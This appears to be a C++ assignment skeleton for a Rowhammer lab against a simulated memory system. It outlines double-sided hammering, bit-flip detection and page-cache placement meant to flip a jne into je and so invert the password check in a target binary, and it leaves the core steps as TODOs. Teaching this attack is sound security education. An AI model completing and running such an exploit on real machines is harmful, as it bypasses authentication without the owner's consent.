#include <algorithm>
#include <array>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <pthread.h>
#include <aio.h>
#include <sys/mman.h>
#include "PhysicalMemory.h"

#define MEMORY_SIZE (4ull*1024ull*1024ull*1024ull)

// NOTE: do not change any of the following 6 constants. this is the configuration of the simulated system you attack and the attack may not work if you change these values
#define CHANNELS (2)
#define RANKS_PER_CHANNEL (2)
#define BANK_GROUPS_PER_RANK (4)
#define BANKS_PER_BANK_GROUP (4)
#define ROW_SIZE_PER_BANK (8192)
#define ROW_SIZE (CHANNELS * RANKS_PER_CHANNEL * BANK_GROUPS_PER_RANK * BANKS_PER_BANK_GROUP * ROW_SIZE_PER_BANK)

// TODO: make sure this points to the target binary
#define BINARY_NAME "./secret"
// this should be the byte offset of the "jne" instruction that you want to change into a "je"
#define BINARY_BYTE_OFFSET_TO_FLIP 0x4906
// this should be the bitmask indicating the flip direction (FE means flip the lowest bit from 1 to 0, as in FF->FE or 01->00)
#define BINARY_TARGET_FLIP_MASK 0xFE

PhysicalMemory* physical_memory = 0;
size_t number_of_bitflips_in_target = 0;

void double_sided_hammer(uint8_t* addr1, uint8_t* addr2)
{
  // TODO: hammer physical memory by alternatingly flushing and reloading the two addresses frequently
  // something between 10k and 10M times should suffice
  // use the functions physical_memory->maccess()
  // and physical_memory->flush() for this purpose
}

bool check_for_bit_flip(uint8_t* memory, size_t row, size_t target_offset, size_t target_bitmask)
{
  for (size_t i = 0; i < ROW_SIZE; ++i)
  {
    // TODO: Check whether each byte is correct
    // you can for instance compare the value at offset i within the row 
    uint8_t byte_in_memory = 0x00; // TODO 
    uint8_t correct_byte_value = 0x00; // TODO 
    if (byte_in_memory != correct_byte_value)
    {
      ++number_of_bitflips_in_target;
      printf("[!] Found %zu. flip (0x%02x != 0x%02x) in row %zd (%zx) when hammering rows %zu and %zu\n", number_of_bitflips_in_target, byte_in_memory, correct_byte_value, row, i, row-1, row+1);
      // TODO: Check if offset in a 4096-byte page would match our target
      size_t bitflip_offset = 0 % 4096; // TODO 
      target_offset = target_offset % 4096;
      if (bitflip_offset == target_offset)
      {
        printf("[!] Bit flip is at target offset %zx\n",target_offset);
        // check whether bit flip does what we need by comparing it to the target flip mask (e.g. 0xFE means that 0xFF flipped to 0xFE, i.e. a bit flip that sets the lowest bit to 0)
        if (byte_in_memory == target_bitmask)
        {
          printf("[!] Bit flip matches target bitmask %zx\n", target_bitmask);
          return true;
        }
      }
    }
  }
  return false;
}

int main()
{
  printf("[!] Initializing large memory mapping ...\n");
  // TODO: MAP MEMORY TO SEARCH FOR BIT FLIPS
  // allocate a few gigabytes that fit in your RAM using mmap
  // - use PROT_READ|PROT_WRITE for prot
  // - use MAP_PRIVATE|MAP_ANONYMOUS for flags
  // - MAP_ANONYMOUS expects an fd of -1 and an offset of 0
  uint8_t* memory = (uint8_t*)0;

  size_t rows = MEMORY_SIZE / ROW_SIZE;
  printf("[!] Identifying %zu rows in this memory range...\n", rows);  
  physical_memory = PhysicalMemory::getPhysicalMapping(memory,MEMORY_SIZE);
  for (size_t i = 0; i < rows-2; ++i)
  {
    // TODO: PREPARE THE SEARCH FOR BIT FLIPS
    // We want to hammer 2 aggressor rows, surrounding a victim row:
    // 1. fill memory rows i and i+2 (aggressor rows) with the target data (e.g. 0x00)
    // 2. fill victim row with opposite value (e.g. 0xff)
    // You can use memset and the ROW_SIZE constant for this

    printf("[!] Hammering rows %zd/%zd/%zd (there are %zd rows in total)\n",i,i+1,i+2,rows);

    // TODO: Compute the exact address for aggressor1, make sure to have spatial locality with the target bit flip location in the page, by adding BINARY_BYTE_OFFSET_TO_FLIP % 4096 (row functions scatter actual physical locations)
    uint8_t* aggressor1 = 0;
    uint8_t* aggressor2 = 0;
    double_sided_hammer(aggressor1,aggressor2);

    if (check_for_bit_flip(memory,i+1,BINARY_BYTE_OFFSET_TO_FLIP,BINARY_TARGET_FLIP_MASK) == true)
    {
      printf("[!] evicting page cache to make sure the target binary page is not in memory\n");
      physical_memory->evictFromPageCache(BINARY_NAME,BINARY_BYTE_OFFSET_TO_FLIP);
      printf("[!] munmap the flippy page. the next page will be allocated exactly into this gap, placed on the flippy page\n");
      physical_memory->munmap(memory+(i+1)*ROW_SIZE,4096);
      printf("[!] load the target page into memory, placing it on the flippy page\n");
      physical_memory->checkIfRunning(BINARY_NAME);
      printf("[!] load the target page into memory, placing it on the flippy page\n");
      physical_memory->loadFile(BINARY_NAME,BINARY_BYTE_OFFSET_TO_FLIP);


      // TODO: HAMMER AGAIN, but this time we want to make sure that the bit really flips so hammer like 50 times - you might have to tune this value until the exploit runs reliably...
      // - you might have to use memset again to initialize the aggressor rows
      // - you want to use double_sided_hammer() again to hammer the target page now
      printf("[!] Hammering rows %zd/%zd/%zd many times to induce bit flip in victim page\n",i,i+1,i+2);

      
      printf("[!] Hopefully the password check is inverted now. Just try it out with any wrong password.\n");
      return 0;
    }
  }
  return 0;
}
